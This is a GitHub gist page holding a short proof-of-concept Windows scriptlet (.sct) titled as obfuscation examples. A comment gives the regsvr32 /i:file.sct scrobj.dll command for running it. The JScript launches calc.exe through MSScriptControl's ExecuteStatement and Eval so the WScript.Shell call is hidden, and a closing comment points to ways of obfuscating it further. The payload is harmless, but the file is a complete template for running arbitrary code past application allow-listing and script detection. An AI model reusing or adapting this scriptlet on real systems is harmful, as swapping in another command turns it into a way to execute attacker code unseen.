Skip to content

Instantly share code, notes, and snippets.

@nicholasmckinney
Created May 8, 2017 00:33
Show Gist options
  • Save nicholasmckinney/f15a775894b8285176e78937c4c3b426 to your computer and use it in GitHub Desktop.
Save nicholasmckinney/f15a775894b8285176e78937c4c3b426 to your computer and use it in GitHub Desktop.
SCT File Obfuscation Examples:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
var scr = new ActiveXObject("MSScriptControl.ScriptControl");
scr.Language = "JScript";
scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
//https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
//Lots of hints here on futher obfuscation
]]></script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment